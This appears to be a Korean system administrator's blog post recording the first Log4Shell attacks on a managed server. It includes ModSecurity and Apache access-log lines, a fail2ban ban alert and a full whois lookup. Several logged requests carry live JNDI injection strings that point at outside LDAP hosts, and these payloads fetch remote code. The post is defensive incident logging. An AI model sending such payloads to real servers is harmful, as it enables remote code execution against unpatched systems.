Log4shell 첫 발생 외

Log4shell 첫 발생 외

 

관리중인 서버에 첫번째 log4shell 공격 확인

 

[11/Dec/2021:07:14:50 +0900] [xxx.xxx.xxx.189/sid#a353cf0][rid#b571a40][/${jndi:ldaps://41e1e3ec.probe001.log4j.leakix.net:8443/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]
[11/Dec/2021:12:46:34 +0900] [xxx.xxx.xxx.142/sid#a64c530][rid#b3a2cd0][/${jndi:ldaps://6c60d031.probe001.log4j.leakix.net:1266/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]
[11/Dec/2021:12:46:35 +0900] [xxx.xxx.xxx.142/sid#a64c530][rid#b18e3d8][/${jndi:ldaps://6c60d031.probe001.log4j.leakix.net:1266/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]

 

Log4Shell 차단용 fail2ban 세팅 후 검출

 

The IP 121.4.56.143 has just been banned by Fail2Ban after
1 attempts against apache-log4j.


Here is more information about 121.4.56.143:

[Querying whois.apnic.net]
[whois.apnic.net]
% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '121.4.0.0 - 121.5.255.255'

% Abuse contact for '121.4.0.0 - 121.5.255.255' is 'ipas@cnnic.cn'

inetnum:        121.4.0.0 - 121.5.255.255
netname:        TencentCloud
descr:          Tencent cloud computing (Beijing) Co., Ltd.
descr:          Floor 6, Yinke Building,38 Haidian St,
descr:          Haidian District Beijing
country:        CN
admin-c:        JT1125-AP
tech-c:         JX1747-AP
abuse-c:        AC1601-AP
status:         ALLOCATED PORTABLE
mnt-by:         MAINT-CNNIC-AP
mnt-lower:      MAINT-CNNIC-AP
mnt-routes:     MAINT-CNNIC-AP
mnt-irt:        IRT-CNNIC-CN
last-modified:  2021-06-16T01:32:05Z
source:         APNIC

irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
auth:           # Filtered
remarks:        Please note that CNNIC is not an ISP and is not
remarks:        empowered to investigate complaints of network abuse.
remarks:        Please contact the tech-c or admin-c of the network.
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-06-16T01:39:57Z
source:         APNIC

role:           ABUSE CNNICCN
address:        Beijing, China
country:        ZZ
phone:          +000000000
e-mail:         ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
nic-hdl:        AC1601-AP
remarks:        Generated from irt object IRT-CNNIC-CN
abuse-mailbox:  ipas@cnnic.cn
mnt-by:         APNIC-ABUSE
last-modified:  2020-05-14T11:19:01Z
source:         APNIC

person:         James Tian
address:        9F, FIYTA Building, Gaoxinnanyi Road,Southern
address:        District of Hi-tech Park, Shenzhen
country:        CN
phone:          +86-755-86013388-84952
e-mail:         clarkcheng@tencent.com
nic-hdl:        JT1125-AP
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-09-17T00:37:15Z
source:         APNIC

person:         Jimmy Xiao
address:        9F, FIYTA Building, Gaoxinnanyi Road,Southern
address:        District of Hi-tech Park, Shenzhen
country:        CN
phone:          +86-755-86013388-80224
e-mail:         klayliang@tencent.com
nic-hdl:        JX1747-AP
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-09-17T00:38:09Z
source:         APNIC

% Information related to '121.4.0.0/15AS45090'

route:          121.4.0.0/15
origin:         AS45090
descr:          China Internet Network Information Center
                Floor1, Building No.1 C/-Chinese Academy of Sciences
                4, South 4th Street
                Haidian District,
mnt-by:         MAINT-CNNIC-AP
last-modified:  2020-02-25T01:14:09Z
source:         APNIC

% This query was served by the APNIC Whois Service version 1.88.15-SNAPSHOT (WHOIS-JP1)


Lines containing IP:121.4.56.143 in /var/log/httpd/*access_log

/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:51 +0900] "GET /${jndi:ldap://185.224.139.151:1389/Exploit} HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "GET / HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "POST /login HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "GET / HTTP/1.1" 400 226

#log4shell #log4j #fail2ban